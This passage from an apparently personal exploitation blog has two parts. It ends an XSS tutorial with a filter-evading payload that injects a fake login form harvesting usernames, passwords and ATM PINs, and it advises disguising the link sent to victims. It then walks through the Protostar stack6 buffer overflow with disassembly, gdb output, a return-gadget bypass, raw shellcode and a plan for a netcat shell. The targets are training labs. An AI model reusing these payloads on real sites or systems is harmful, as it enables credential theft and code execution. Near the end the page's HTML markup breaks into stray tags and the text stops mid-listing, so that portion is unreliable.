So it worked but we have / surrounding the string, we can use the substring method and the length property to remove these, we need to send the following URL:

http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=x=String(/xss/),alert(x.substring(1,x.length-1))

We will be using the String and substring methods a lot, so it would be best if we create aliases for these to shorten our payload, we can create a function for the substring section like this:

y=function(z){return/**/z.substring(1,z.length-1)}

I have used /**/ here because we are also unable to use spaces (they are URL encoded too) and this just acts as a comment.

This function takes 1 argument and returns the string with the first and last character removed.

We can create an alias for the String method using this code:

S=String

Before we start to write our payload, let's test this with an alert by sending the following URL:

http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=S=String,y=function(z){return/**/z.substring(1,z.length-1)},alert(y(S(/xss/)))

So it works, lastly all we need to do is remove the string Mathemagic and the div tag that contains the result.

Looking at the source we can see that the Mathemagic string is contained in a h2 tag and there are no other h2 tags on the page, so we can find this using the getElementsByTagName method.

The result is contained inside a div tag which has the id value set to result, so we can find this using the getElementById method.

Both of these we can remove using the remove method.

We are now ready to write our payload, here is the "beutified" version of the payload, remember that this all goes on 1 line and with , seperating the instructions and not ;:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
S=String;
y=function(z){
    return/**/z.substring(1,z.length-1);
};
d=document;
f=d.createElement(y(S(/form/)));
h=d.createElement(y(S(/h2/)));
h.className=y(S(/form-signin-heading/));
h.innerHTML=y(S(/Please&#32sign&#32in/));
z=S(/input/);
u=d.createElement(y(z));
p=d.createElement(y(z));
a=d.createElement(y(z));
z=S(/input-block-level/);
u.className=y(z);
p.className=y(z);
a.className=y(z);
u.placeholder=y(S(/username/));
u.name=y(S(/un/));
u.type=y(S(/text/));
p.name=y(S(/pw/));
p.placeholder=y(S(/Password/));
z=S(/password/);
p.type=y(z);
a.type=y(z);
a.name=y(S(/atm/));
a.placeholder=y(S(/ATMPIN/));
b=d.createElement(y(S(/button/)));
b.className=y(S(/btn/));
b.classList.add(y(S(/btn-large/)));
b.classList.add(y(S(/btn-primary/)));
b.type=y(S(/submit/));
b.innerHTML=y(S(/Login/));
f.appendChild(h);
f.appendChild(u);
f.appendChild(p);
f.appendChild(a);
f.appendChild(b);
f.className=y(S(/form-signin/));
f.action=y(S(/http:\/\/localhost:9000\//).replace(/\\/g,String()));
c=d.getElementsByClassName(y(S(/container/)))[0];
e=d.getElementsByClassName(y(S(/well/)))[0];
c.insertBefore(f,e);
c.getElementsByTagName(y(S(/h2/)))[0].remove();
d.getElementById(y(S(/result/))).remove()

So using this the URL that you will need to send is:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=S=String,y=funct
ion(z){return/**/z.substring(1,z.length-1)},d=document,f=d.createElement(y(S(
/form/))),h=d.createElement(y(S(/h2/))),h.className=y(S(/form-signin-heading/
)),h.innerHTML=y(S(/Please&#32sign&#32in/)),z=S(/input/),u=d.createElement(y(
z)),p=d.createElement(y(z)),a=d.createElement(y(z)),z=S(/input-block-level/),
u.className=y(z),p.className=y(z),a.className=y(z),u.placeholder=y(S(/usernam
e/)),u.name=y(S(/un/)),u.type=y(S(/text/)),p.name=y(S(/pw/)),p.placeholder=y(
S(/Password/)),z=S(/password/),p.type=y(z),a.type=y(z),a.name=y(S(/atm/)),a.p
laceholder=y(S(/ATMPIN/)),b=d.createElement(y(S(/button/))),b.className=y(S(/
btn/)),b.classList.add(y(S(/btn-large/))),b.classList.add(y(S(/btn-primary/))
),b.type=y(S(/submit/)),b.innerHTML=y(S(/Login/)),f.appendChild(h),f.appendCh
ild(u),f.appendChild(p),f.appendChild(a),f.appendChild(b),f.className=y(S(/fo
rm-signin/)),f.action=y(S(/http:\/\/localhost:9000\//).replace(/\\/g,String()
)),c=d.getElementsByClassName(y(S(/container/)))[0],e=d.getElementsByClassNam
e(y(S(/well/)))[0],c.insertBefore(f,e),c.getElementsByTagName(y(S(/h2/)))[0].
remove(),d.getElementById(y(S(/result/))).remove()

After sending this URL you should see the following:

PWNED!!! :-)

Conclusion

For the last to exploits, the redirection URL of the python server would have to be changed.

XSS exploits can vary greatly, but as long as you can get JavaScript to run you should be able to get full control over the page.

There are various methods for bypassing different filters and I've only mentioned a couple here but the methods that you use will highly depend on the filter that you are facing.

A lot of trial and error is needed to determine how best to bypass the filter than is in place.

In each of these examples, to take advantage of the exploit, you need to send the URL that we have created to the victim. A URL containing all of this information might look very strange to the victim so it might be best to URL encode the whole payload, you can do this in BurpSuite's Decoder tab or on a website like this, its worth noting though that Burp will URL encode all of the text (incuding any alphanumeric characters), that website (like most) will only encode certain characters.

Further Reading

OWASP is the authority on web security so their website contains any relavent information regarding this.

The OWASP XSS page and XSS filter evasion cheat sheet are very good resources.

Also, the OWASP testing guide has a great page on how to go about testing for XSS.

Ret2Libc and ROP

So far, all of our exploits have included shellcode, on most (if not all) modern systems it isn't possible to just run shellcode like this because of NX.

NX disallows running code in certain memory segments, primarily memory segments that contain variable data, like the stack and heap.

A number of techniques were created to beat NX and I want to demostrate 2 of them here, return to libc (Ret2Libc) and return-oriented programming (ROP).

This will be slightly different to my previous posts as I will not be hacking an application that I wrote but instead taking on 2 challenges from the protostar section of exploit exercises.

The challenges that we will look at here are stack6 and stack7.

While these challenges have both NX and ASLR disabled they both implement their own protection which disables the straight running of shellcode.

Stack6: The App

So if you look at the webpage for stack6, it actually gives you the source code:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
    printf("bzzzt (%p)\n", ret);
    _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

The buffer overflow is on line 13, the application then gets the function return address on line 15 and checks it on line 17.

If the return address begins with bf the application exits, stack addresses normally begin with bf so you cannot just overwrite it with an address on the stack.

One other thing to notice here is that the vulnerable line is using the gets function, this function will only stop once it reaches a newline (\n) or end of file (EOF) character so we do not need to avoid null (\0) characters.

Stack6: The Easy Way

While I've written this post to demonstrate Ret2Libc and ROP we can get our shellcode to run on these 2 challenges using the exact same method which I'll explain quickly here.

So our buffer is 64 bytes long, we have the local variable ret which is 4 bytes, then we have the saved EBP from main's stack frame and finally the return address, its worth noting that the stack has to be 16 byte aligned so 8 will need to be added before you get to the return address. So we need to write 64+4+4+8 = 80 bytes before we overwrite the return address and hijack EIP.

Lets test this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$ bash
user@protostar:~$ cd /opt/protostar/bin/
user@protostar:/opt/protostar/bin$ python -c 'print "A"*80' > /tmp/t
user@protostar:/opt/protostar/bin$ python -c 'print "A"*84' > /tmp/t2
user@protostar:/opt/protostar/bin$ gdb -q ./stack6
Reading symbols from /opt/protostar/bin/stack6...done.
(gdb) r < /tmp/t
Starting program: /opt/protostar/bin/stack6 < /tmp/t
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�AAAAAAAAAAAA� �

Program received signal SIGSEGV, Segmentation fault.
0x08048507 in main (argc=Cannot access memory at address 0x41414149
) at stack6/stack6.c:31
31  stack6/stack6.c: No such file or directory.
    in stack6/stack6.c
(gdb) r < /tmp/t2
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack6 < /tmp/t2
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

So we were correct, we can now test what happens if we write an address beginning with bf:

1
2
user@protostar:/opt/protostar/bin$ python -c 'print "A"*80 + "\x00\x00\x00\xbf"' | ./stack6
input path please: bzzzt (0xbf000000)

As you can see we've hit the printf inside the if statement and exited without seg faulting.

If there was a jmp esp or ff e4 in the application code we could use the same method we used in the beating ASLR post but that isn't the case here.

We can still run our shellcode though using a slightly more complex method, the application is only checking the return address of the current function (note the argument to the __builtin_return_address function call), so we just need to make sure that this address doesn't start with bf.

We'll do this by using 1 ROP "gadget", let's first find the address of our gadget:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
user@protostar:/opt/protostar/bin$ objdump -d ./stack6 -M intel

./stack6:     file format elf32-i386


Disassembly of section .init:

08048330 <_init>:
 8048330:   55                      push   ebp
 8048331:   89 e5                   mov    ebp,esp
 8048333:   53                      push   ebx
 8048334:   83 ec 04                sub    esp,0x4
 8048337:   e8 00 00 00 00          call   804833c <_init+0xc>
 804833c:   5b                      pop    ebx
 804833d:   81 c3 b0 13 00 00       add    ebx,0x13b0
 8048343:   8b 93 fc ff ff ff       mov    edx,DWORD PTR [ebx-0x4]
 8048349:   85 d2                   test   edx,edx
 804834b:   74 05                   je     8048352 <_init+0x22>
 804834d:   e8 1e 00 00 00          call   8048370 <__gmon_start__@plt>
 8048352:   e8 09 01 00 00          call   8048460 <frame_dummy>
 8048357:   e8 24 02 00 00          call   8048580 <__do_global_ctors_aux>
 804835c:   58                      pop    eax
 804835d:   5b                      pop    ebx
 804835e:   c9                      leave  
 804835f:   c3                      ret    

Disassembly of section .plt:

08048360 <__gmon_start__@plt-0x10>:
 8048360:   ff 35 f0 96 04 08       push   DWORD PTR ds:0x80496f0
 8048366:   ff 25 f4 96 04 08       jmp    DWORD PTR ds:0x80496f4
 804836c:   00 00                   add    BYTE PTR [eax],al
    ...

08048370 <__gmon_start__@plt>:
 8048370:   ff 25 f8 96 04 08       jmp    DWORD PTR ds:0x80496f8
 8048376:   68 00 00 00 00          push   0x0
 804837b:   e9 e0 ff ff ff          jmp    8048360 <_init+0x30>

08048380 <gets@plt>:
 8048380:   ff 25 fc 96 04 08       jmp    DWORD PTR ds:0x80496fc
 8048386:   68 08 00 00 00          push   0x8
 804838b:   e9 d0 ff ff ff          jmp    8048360 <_init+0x30>

08048390 <__libc_start_main@plt>:
 8048390:   ff 25 00 97 04 08       jmp    DWORD PTR ds:0x8049700
 8048396:   68 10 00 00 00          push   0x10
 804839b:   e9 c0 ff ff ff          jmp    8048360 <_init+0x30>

080483a0 <_exit@plt>:
 80483a0:   ff 25 04 97 04 08       jmp    DWORD PTR ds:0x8049704
 80483a6:   68 18 00 00 00          push   0x18
 80483ab:   e9 b0 ff ff ff          jmp    8048360 <_init+0x30>

080483b0 <fflush@plt>:
 80483b0:   ff 25 08 97 04 08       jmp    DWORD PTR ds:0x8049708
 80483b6:   68 20 00 00 00          push   0x20
 80483bb:   e9 a0 ff ff ff          jmp    8048360 <_init+0x30>

080483c0 <printf@plt>:
 80483c0:   ff 25 0c 97 04 08       jmp    DWORD PTR ds:0x804970c
 80483c6:   68 28 00 00 00          push   0x28
 80483cb:   e9 90 ff ff ff          jmp    8048360 <_init+0x30>

Disassembly of section .text:

080483d0 <_start>:
 80483d0:   31 ed                   xor    ebp,ebp
 80483d2:   5e                      pop    esi
 80483d3:   89 e1                   mov    ecx,esp
 80483d5:   83 e4 f0                and    esp,0xfffffff0
 80483d8:   50                      push   eax
 80483d9:   54                      push   esp
 80483da:   52                      push   edx
 80483db:   68 10 85 04 08          push   0x8048510
 80483e0:   68 20 85 04 08          push   0x8048520
 80483e5:   51                      push   ecx
 80483e6:   56                      push   esi
 80483e7:   68 fa 84 04 08          push   0x80484fa
 80483ec:   e8 9f ff ff ff          call   8048390 <__libc_start_main@plt>
 80483f1:   f4                      hlt    
 80483f2:   90                      nop
 80483f3:   90                      nop
 80483f4:   90                      nop
 80483f5:   90                      nop
 80483f6:   90                      nop
 80483f7:   90                      nop
 80483f8:   90                      nop
 80483f9:   90                      nop
 80483fa:   90                      nop
 80483fb:   90                      nop
 80483fc:   90                      nop
 80483fd:   90                      nop
 80483fe:   90                      nop
 80483ff:   90                      nop

08048400 <__do_global_dtors_aux>:
 8048400:   55                      push   ebp
 8048401:   89 e5                   mov    ebp,esp
 8048403:   53                      push   ebx
 8048404:   83 ec 04                sub    esp,0x4
 8048407:   80 3d 24 97 04 08 00    cmp    BYTE PTR ds:0x8049724,0x0
 804840e:   75 3f                   jne    804844f <__do_global_dtors_aux+0x4f>
 8048410:   a1 28 97 04 08          mov    eax,ds:0x8049728
 8048415:   bb 10 96 04 08          mov    ebx,0x8049610
 804841a:   81 eb 0c 96 04 08       sub    ebx,0x804960c
 8048420:   c1 fb 02                sar    ebx,0x2
 8048423:   83 eb 01                sub    ebx,0x1
 8048426:   39 d8                   cmp    eax,ebx
 8048428:   73 1e                   jae    8048448 <__do_global_dtors_aux+0x48>
 804842a:   8d b6 00 00 00 00       lea    esi,[esi+0x0]
 8048430:   83 c0 01                add    eax,0x1
 8048433:   a3 28 97 04 08          mov    ds:0x8049728,eax
 8048438:   ff 14 85 0c 96 04 08    call   DWORD PTR [eax*4+0x804960c]
 804843f:   a1 28 97 04 08          mov    eax,ds:0x8049728
 8048444:   39 d8                   cmp    eax,ebx
 8048446:   72 e8                   jb     8048430 <__do_global_dtors_aux+0x30>
 8048448:   c6 05 24 97 04 08 01    mov    BYTE PTR ds:0x8049724,0x1
 804844f:   83 c4 04                add    esp,0x4
 8048452:   5b                      pop    ebx
 8048453:   5d                      pop    ebp
 8048454:   c3                      ret    
 8048455:   8d 74 26 00             lea    esi,[esi+eiz*1+0x0]
 8048459:   8d bc 27 00 00 00 00    lea    edi,[edi+eiz*1+0x0]

08048460 <frame_dummy>:
 8048460:   55                      push   ebp
 8048461:   89 e5                   mov    ebp,esp
 8048463:   83 ec 18                sub    esp,0x18
 8048466:   a1 14 96 04 08          mov    eax,ds:0x8049614
 804846b:   85 c0                   test   eax,eax
 804846d:   74 12                   je     8048481 <frame_dummy+0x21>
 804846f:   b8 00 00 00 00          mov    eax,0x0
 8048474:   85 c0                   test   eax,eax
 8048476:   74 09                   je     8048481 <frame_dummy+0x21>
 8048478:   c7 04 24 14 96 04 08    mov    DWORD PTR [esp],0x8049614
 804847f:   ff d0                   call   eax
 8048481:   c9                      leave  
 8048482:   c3                      ret    
 8048483:   90                      nop

08048484 <getpath>:
 8048484:   55                      push   ebp
 8048485:   89 e5                   mov    ebp,esp
 8048487:   83 ec 68                sub    esp,0x68
 804848a:   b8 d0 85 04 08          mov    eax,0x80485d0
 804848f:   89 04 24                mov    DWORD PTR [esp],eax
 8048492:   e8 29 ff ff ff          call   80483c0 <printf@plt>
 8048497:   a1 20 97 04 08          mov    eax,ds:0x8049720
 804849c:   89 04 24                mov    DWORD PTR [esp],eax
 804849f:   e8 0c ff ff ff          call   80483b0 <fflush@plt>
 80484a4:   8d 45 b4                lea    eax,[ebp-0x4c]
 80484a7:   89 04 24                mov    DWORD PTR [esp],eax
 80484aa:   e8 d1 fe ff ff          call   8048380 <gets@plt>
 80484af:   8b 45 04                mov    eax,DWORD PTR [ebp+0x4]
 80484b2:   89 45 f4                mov    DWORD PTR [ebp-0xc],eax
 80484b5:   8b 45 f4                mov    eax,DWORD PTR [ebp-0xc]
 80484b8:   25 00 00 00 bf          and    eax,0xbf000000
 80484bd:   3d 00 00 00 bf          cmp    eax,0xbf000000
 80484c2:   75 20                   jne    80484e4 <getpath+0x60>
 80484c4:   b8 e4 85 04 08          mov    eax,0x80485e4
 80484c9:   8b 55 f4                mov    edx,DWORD PTR [ebp-0xc]
 80484cc:   89 54 24 04             mov    DWORD PTR [esp+0x4],edx
 80484d0:   89 04 24                mov    DWORD PTR [esp],eax
 80484d3:   e8 e8 fe ff ff          call   80483c0 <printf@plt>
 80484d8:   c7 04 24 01 00 00 00    mov    DWORD PTR [esp],0x1
 80484df:   e8 bc fe ff ff          call   80483a0 <_exit@plt>
 80484e4:   b8 f0 85 04 08          mov    eax,0x80485f0
 80484e9:   8d 55 b4                lea    edx,[ebp-0x4c]
 80484ec:   89 54 24 04             mov    DWORD PTR [esp+0x4],edx
 80484f0:   89 04 24                mov    DWORD PTR [esp],eax
 80484f3:   e8 c8 fe ff ff          call   80483c0 <printf@plt>
 80484f8:   c9                      leave  
 80484f9:   c3                      ret    

080484fa <main>:
 80484fa:   55                      push   ebp
 80484fb:   89 e5                   mov    ebp,esp
 80484fd:   83 e4 f0                and    esp,0xfffffff0
 8048500:   e8 7f ff ff ff          call   8048484 <getpath>
 8048505:   89 ec                   mov    esp,ebp
 8048507:   5d                      pop    ebp
 8048508:   c3                      ret    
 8048509:   90                      nop
 804850a:   90                      nop
 804850b:   90                      nop
 804850c:   90                      nop
 804850d:   90                      nop
 804850e:   90                      nop
 804850f:   90                      nop

08048510 <__libc_csu_fini>:
 8048510:   55                      push   ebp
 8048511:   89 e5                   mov    ebp,esp
 8048513:   5d                      pop    ebp
 8048514:   c3                      ret    
 8048515:   8d 74 26 00             lea    esi,[esi+eiz*1+0x0]
 8048519:   8d bc 27 00 00 00 00    lea    edi,[edi+eiz*1+0x0]

08048520 <__libc_csu_init>:
 8048520:   55                      push   ebp
 8048521:   89 e5                   mov    ebp,esp
 8048523:   57                      push   edi
 8048524:   56                      push   esi
 8048525:   53                      push   ebx
 8048526:   e8 4f 00 00 00          call   804857a <__i686.get_pc_thunk.bx>
 804852b:   81 c3 c1 11 00 00       add    ebx,0x11c1
 8048531:   83 ec 1c                sub    esp,0x1c
 8048534:   e8 f7 fd ff ff          call   8048330 <_init>
 8048539:   8d bb 18 ff ff ff       lea    edi,[ebx-0xe8]
 804853f:   8d 83 18 ff ff ff       lea    eax,[ebx-0xe8]
 8048545:   29 c7                   sub    edi,eax
 8048547:   c1 ff 02                sar    edi,0x2
 804854a:   85 ff                   test   edi,edi
 804854c:   74 24                   je     8048572 <__libc_csu_init+0x52>
 804854e:   31 f6                   xor    esi,esi
 8048550:   8b 45 10                mov    eax,DWORD PTR [ebp+0x10]
 8048553:   89 44 24 08             mov    DWORD PTR [esp+0x8],eax
 8048557:   8b 45 0c                mov    eax,DWORD PTR [ebp+0xc]
 804855a:   89 44 24 04             mov    DWORD PTR [esp+0x4],eax
 804855e:   8b 45 08                mov    eax,DWORD PTR [ebp+0x8]
 8048561:   89 04 24                mov    DWORD PTR [esp],eax
 8048564:   ff 94 b3 18 ff ff ff    call   DWORD PTR [ebx+esi*4-0xe8]
 804856b:   83 c6 01                add    esi,0x1
 804856e:   39 fe                   cmp    esi,edi
 8048570:   72 de                   jb     8048550 <__libc_csu_init+0x30>
 8048572:   83 c4 1c                add    esp,0x1c
 8048575:   5b                      pop    ebx
 8048576:   5e                      pop    esi
 8048577:   5f                      pop    edi
 8048578:   5d                      pop    ebp
 8048579:   c3                      ret    

0804857a <__i686.get_pc_thunk.bx>:
 804857a:   8b 1c 24                mov    ebx,DWORD PTR [esp]
 804857d:   c3                      ret    
 804857e:   90                      nop
 804857f:   90                      nop

08048580 <__do_global_ctors_aux>:
 8048580:   55                      push   ebp
 8048581:   89 e5                   mov    ebp,esp
 8048583:   53                      push   ebx
 8048584:   83 ec 04                sub    esp,0x4
 8048587:   a1 04 96 04 08          mov    eax,ds:0x8049604
 804858c:   83 f8 ff                cmp    eax,0xffffffff
 804858f:   74 13                   je     80485a4 <__do_global_ctors_aux+0x24>
 8048591:   bb 04 96 04 08          mov    ebx,0x8049604
 8048596:   66 90                   xchg   ax,ax
 8048598:   83 eb 04                sub    ebx,0x4
 804859b:   ff d0                   call   eax
 804859d:   8b 03                   mov    eax,DWORD PTR [ebx]
 804859f:   83 f8 ff                cmp    eax,0xffffffff
 80485a2:   75 f4                   jne    8048598 <__do_global_ctors_aux+0x18>
 80485a4:   83 c4 04                add    esp,0x4
 80485a7:   5b                      pop    ebx
 80485a8:   5d                      pop    ebp
 80485a9:   c3                      ret    
 80485aa:   90                      nop
 80485ab:   90                      nop

Disassembly of section .fini:

080485ac <_fini>:
 80485ac:   55                      push   ebp
 80485ad:   89 e5                   mov    ebp,esp
 80485af:   53                      push   ebx
 80485b0:   83 ec 04                sub    esp,0x4
 80485b3:   e8 00 00 00 00          call   80485b8 <_fini+0xc>
 80485b8:   5b                      pop    ebx
 80485b9:   81 c3 34 11 00 00       add    ebx,0x1134
 80485bf:   e8 3c fe ff ff          call   8048400 <__do_global_dtors_aux>
 80485c4:   59                      pop    ecx
 80485c5:   5b                      pop    ebx
 80485c6:   c9                      leave  
 80485c7:   c3                      ret

All we're looking for here is a ret instruction, there are a few, we'll use the 1 on line 258, the address of this is 80485a9 so this will be our return address.

After the return address we insert some junk data (4 bytes) and then we will put the address of our shellcode.

First let's find the address that our shellcode will be at, this needs to be done in 2 terminals:

1
2
user@protostar:/opt/protostar/bin$ ./stack6
input path please:
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
root@protostar:/# ps ax | grep stack6
 2221 pts/0    S+     0:00 ./stack6
 2268 pts/1    S+     0:00 grep stack6
root@protostar:/# gdb -q -p 2221
Attaching to process 2221
Reading symbols from /opt/protostar/bin/stack6...done.
Reading symbols from /lib/libc.so.6...Reading symbols from /usr/lib/debug/lib/libc-2.11.2.so...done.
(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...Reading symbols from /usr/lib/debug/lib/ld-2.11.2.so...done.
(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb7f53c1e in __read_nocancel () at ../sysdeps/unix/syscall-template.S:82
82  ../sysdeps/unix/syscall-template.S: No such file or directory.
    in ../sysdeps/unix/syscall-template.S
(gdb) set disassembly-flavor intel
Current language:  auto
The current source language is "auto; currently asm".
(gdb) disassemble getpath
Dump of assembler code for function getpath:
0x08048484 <getpath+0>: push   ebp
0x08048485 <getpath+1>: mov    ebp,esp
0x08048487 <getpath+3>: sub    esp,0x68
0x0804848a <getpath+6>: mov    eax,0x80485d0
0x0804848f <getpath+11>:    mov    DWORD PTR [esp],eax
0x08048492 <getpath+14>:    call   0x80483c0 <printf@plt>
0x08048497 <getpath+19>:    mov    eax,ds:0x8049720
0x0804849c <getpath+24>:    mov    DWORD PTR [esp],eax
0x0804849f <getpath+27>:    call   0x80483b0 <fflush@plt>
0x080484a4 <getpath+32>:    lea    eax,[ebp-0x4c]
0x080484a7 <getpath+35>:    mov    DWORD PTR [esp],eax
0x080484aa <getpath+38>:    call   0x8048380 <gets@plt>
0x080484af <getpath+43>:    mov    eax,DWORD PTR [ebp+0x4]
0x080484b2 <getpath+46>:    mov    DWORD PTR [ebp-0xc],eax
0x080484b5 <getpath+49>:    mov    eax,DWORD PTR [ebp-0xc]
0x080484b8 <getpath+52>:    and    eax,0xbf000000
0x080484bd <getpath+57>:    cmp    eax,0xbf000000
0x080484c2 <getpath+62>:    jne    0x80484e4 <getpath+96>
0x080484c4 <getpath+64>:    mov    eax,0x80485e4
0x080484c9 <getpath+69>:    mov    edx,DWORD PTR [ebp-0xc]
0x080484cc <getpath+72>:    mov    DWORD PTR [esp+0x4],edx
0x080484d0 <getpath+76>:    mov    DWORD PTR [esp],eax
0x080484d3 <getpath+79>:    call   0x80483c0 <printf@plt>
0x080484d8 <getpath+84>:    mov    DWORD PTR [esp],0x1
0x080484df <getpath+91>:    call   0x80483a0 <_exit@plt>
0x080484e4 <getpath+96>:    mov    eax,0x80485f0
0x080484e9 <getpath+101>:   lea    edx,[ebp-0x4c]
0x080484ec <getpath+104>:   mov    DWORD PTR [esp+0x4],edx
0x080484f0 <getpath+108>:   mov    DWORD PTR [esp],eax
0x080484f3 <getpath+111>:   call   0x80483c0 <printf@plt>
0x080484f8 <getpath+116>:   leave  
0x080484f9 <getpath+117>:   ret    
End of assembler dump.
(gdb) break *0x080484af
Breakpoint 1 at 0x80484af: file stack6/stack6.c, line 15.
(gdb) c
Continuing.
1
AAAAAAAAAAAA
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
Breakpoint 1, getpath () at stack6/stack6.c:15
15  stack6/stack6.c: No such file or directory.
    in stack6/stack6.c
Current language:  auto
The current source language is "auto; currently c".
(gdb) x/20xw $esp
0xbffff770: 0xbffff78c  0x00000000  0xb7fe1b28  0x00000001
0xbffff780: 0x00000000  0x00000001  0xb7fff8f8  0x41414141
0xbffff790: 0x41414141  0x41414141  0xbffff700  0xb7eada75
0xbffff7a0: 0xb7fd7ff4  0x080496ec  0xbffff7b8  0x0804835c
0xbffff7b0: 0xb7ff1040  0x080496ec  0xbffff7e8  0x08048539

This means our payload will start at 0xbffff780+0xc = 0xbffff78c.

For this challenge I will put the shellcode at the end of the payload, we know the starting address of our payload and how many bytes until the shellcode so our shellcode will be at 0xbffff78c+0x58 = 0xbffff7e4.

I first tried with a normal shellcode that I had written but it didn't work:

1
2
3
4
5
user@protostar:/opt/protostar/bin$ python -c 'print "A"*80 + "\xa9\x85\x04\x08" + "\xe4\xf7\xff\xbf" + "\xeb\x25\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x31\xd2\xb2\x09\x42\x89\x1c\x13\x31\xc9\x89\x4b\x0e\x8d\x0c\x13\x8d\x53\x0e\xcd\x80\xe8\xd6\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"' | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA�������%1�̀��[�C  �
                                                                                                                                 1Ҳ B�1ɉK�/span/span
span class="code-line"span class="go"       �S̀�����/bin/bashABBBBCCCC/span/span
span class="code-line"span class="gp"user@protostar:/opt/protostar/bin$/span/span
span class="code-line"/code/pre/div
/td/tr/table
pSo it launched... Don't know what happened here, after some investigation I decided that it did actually run code/bin/bash/code but exited straight away./p
pAfter some thinking I decide that I'm going to get codeexecve/code to run codebash/code and that to run codenc/code to execute a shell, there are plenty of ways to get a shell in this situation, creating a script and running that, running codenc/code directly..., this was just the first 1 that come to mind for me./p
pcodenc/code or a href="http://netcat.sourceforge.net/" target="_blank"netcat/a is a handy networking tool that can be used for a number of things, here we will use it to execute a shell./p
pSo I rewrote the shellcode, started codenc/code listening on port 9000 in 1 terminal:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:~$ /spannc -l -p span class="m"9000/span/span
span class="code-line"/code/pre/div
/td/tr/table
pAnd then launched the exploit with the new shellcode:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/span
span class="code-line"span class="normal"3/span/span
span class="code-line"span class="normal"4/span/span
